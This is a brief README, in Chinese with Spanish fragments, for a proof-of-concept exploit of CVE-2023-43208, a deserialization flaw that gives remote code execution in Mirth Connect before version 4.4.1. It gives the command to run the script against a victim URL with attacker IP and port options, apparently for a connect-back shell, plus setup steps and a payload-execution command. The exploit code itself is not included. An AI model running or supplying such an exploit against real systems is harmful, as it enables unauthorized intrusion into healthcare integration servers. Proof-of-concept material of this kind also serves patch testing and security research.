
此脚本是针对 Mirth Connect(4.4.1 之前版本)中远程代码执行(RCE)漏洞的概念验证(PoC)。它通过 API 利用 XStream 反序列化漏洞。
python3 CVE-2023-43208.py -u [https://IP-victima] -lh [IP-atacante] -lp [puerto]
建议使用虚拟环境:
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
#Ejecucion de payload
python3 payload.py